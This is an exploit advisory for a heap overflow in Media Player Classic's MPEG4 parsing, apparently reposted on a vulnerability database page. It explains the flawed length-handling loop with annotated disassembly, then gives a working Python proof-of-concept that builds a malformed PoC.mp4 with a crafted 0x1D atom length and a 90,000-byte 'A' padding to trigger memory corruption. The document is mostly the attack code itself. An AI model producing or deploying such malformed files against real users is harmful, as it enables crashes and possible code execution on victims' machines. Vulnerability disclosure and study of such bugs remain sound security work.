# Title : Media player Classic .MPEG4 Heap overflow Vulnerability
# Auther : Senator of Pirates (Khalil Zhani)
# FaceBook : /SenatorofPiratesInfo
# E-Mail : Senator.of.Pirates.team[at]gmail.com
# Greeting : To my best friend Mr. Marshal Webb
bug :
----
The vulnerability is caused due to an heap overflow error, in sub_009F76B0 function there is loop which if the lenght size was individual value like 0x1D the loop will continues and then overflow will happen.
009F76B0 /$ 6A FF PUSH -1
009F76B2 |. 68 9372D000 PUSH mpc-hc.00D07293
009F76B7 |. 64:A1 00000000 MOV EAX,DWORD PTR FS:[0]
009F76BD |. 50 PUSH EAX
009F76BE |. 53 PUSH EBX
009F76BF |. 55 PUSH EBP
009F76C0 |. 56 PUSH ESI
009F76C1 |. 57 PUSH EDI
009F76C2 |. A1 7007DC00 MOV EAX,DWORD PTR DS:[DC0770]
009F76C7 |. 33C4 XOR EAX,ESP
009F76C9 |. 50 PUSH EAX
009F76CA |. 8D4424 14 LEA EAX,DWORD PTR SS:[ESP+14]
009F76CE |. 64:A3 00000000 MOV DWORD PTR FS:[0],EAX
009F76D4 |. 8B6C24 30 MOV EBP,DWORD PTR SS:[ESP+30]
009F76D8 |. 8B7C24 24 MOV EDI,DWORD PTR SS:[ESP+24]
009F76DC |. 8B4424 2C MOV EAX,DWORD PTR SS:[ESP+2C]
009F76E0 |. 8B5C24 28 MOV EBX,DWORD PTR SS:[ESP+28] # length size 8 bits
...
009F773D |. 8B4424 2C MOV EAX,DWORD PTR SS:[ESP+2C]
009F7741 |. 83C3 F0 ADD EBX,-10 # length size 8 bits -10
009F7744 |. 83D0 FF ADC EAX,-1
009F7747 |. 8BCB MOV ECX,EBX
009F7749 |. 0BC8 OR ECX,EAX
009F774B |. 894424 2C MOV DWORD PTR SS:[ESP+2C],EAX
009F774F |. 74 45 JE SHORT mpc-hc.009F7796
009F7751 |> 8B55 00 /MOV EDX,DWORD PTR SS:[EBP] # beginning of loop ; mpc-hc.004F9DA4
009F7754 |. 8B52 18 |MOV EDX,DWORD PTR DS:[EDX+18]
009F7757 |. 8D4424 30 |LEA EAX,DWORD PTR SS:[ESP+30]
009F775B |. 50 |PUSH EAX
009F775C |. 8BCD |MOV ECX,EBP
009F775E |. FFD2 |CALL EDX
009F7760 |. 8B46 08 |MOV EAX,DWORD PTR DS:[ESI+8]
009F7763 |. 40 |INC EAX
009F7764 |. 3B46 04 |CMP EAX,DWORD PTR DS:[ESI+4]
009F7767 |. 76 09 |JBE SHORT mpc-hc.009F7772
009F7769 |. E8 82DAFFFF |CALL mpc-hc.009F51F0
009F776E |. 85C0 |TEST EAX,EAX
009F7770 |. 75 10 |JNZ SHORT mpc-hc.009F7782
009F7772 |> 8B4E 08 |MOV ECX,DWORD PTR DS:[ESI+8]
009F7775 |. 8B56 0C |MOV EDX,DWORD PTR DS:[ESI+C]
009F7778 |. 8B4424 30 |MOV EAX,DWORD PTR SS:[ESP+30]
009F777C |. 89048A |MOV DWORD PTR DS:[EDX+ECX*4],EAX # overflows
009F777F |. FF46 08 |INC DWORD PTR DS:[ESI+8]
009F7782 |> 8B4424 2C |MOV EAX,DWORD PTR SS:[ESP+2C]
009F7786 |. 83C3 FC |ADD EBX,-4 # length size 8 bits -10 (here the reason of bug if the value is individual 0x1D)
009F7789 |. 83D0 FF |ADC EAX,-1
009F778C |. 8BCB |MOV ECX,EBX
009F778E |. 0BC8 |OR ECX,EAX
009F7790 |. 894424 2C |MOV DWORD PTR SS:[ESP+2C],EAX
009F7794 |.^75 BB \JNZ SHORT mpc-hc.009F7751 # end of loop
PoC :
----
poc = ("\x00\x00\x00\x1D\x66\x74\x79\x70\x6D\x70\x34\x32\x00\x00\x00\x00\x69\x73\x6F\x6D\x61\x76"
"\x63\x31\x6D\x70\x34\x32\x00\x01\xAA\x71\x6D\x6F\x6F\x76\x00\x00\x00\x6C\x6D\x76\x68\x64"
"\x00\x00\x00\x00\xC4\x92\x34\x4F\xC4\x92\x34\x4F\x00\x00\x02\x58\x00\x02\xFB\xAC\x00\x01"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x15\x69\x6F\x64\x73\x00\x00"
"\x00\x00\x10\x07\x00\x4F\xFF\xFF\x29\x15\xFF\x00\x00\xE7\x91\x74\x72\x61\x6B\x00\x00\x00"
"\x5C\x74\x6B\x68\x64\x00\x00\x00\x01\xC4\x92\x34\x4F\xC4\x92\x34\x50\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x02\xFB\xA5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\xE7\x2D\x6D\x64\x69\x61\x00\x00\x00\x20\x6D\x64\x68\x64\x00\x00\x00\x00\xC4"
"\x92\x34\x4F\xC4\x92\x34\x50\x00\x00\xAC\x44\x00\xDB\x40\x00\x55\xC4\x00\x00\x00\x00\x00"
"\x42\x68\x64\x6C\x72\x00\x00\x00\x00\x00\x00\x00\x00\x73\x6F\x75\x6E\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00");
poc += "\x41" * 90000
try:
A = open("PoC.mp4","wb")
A.write(poc)
A.close()
print "[*] The file created [*]"
except:
print "[*] Error while creating file [*]"
print "[*] Enter to continue.. [*]"
raw_input()
# 0day.today [2018-03-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation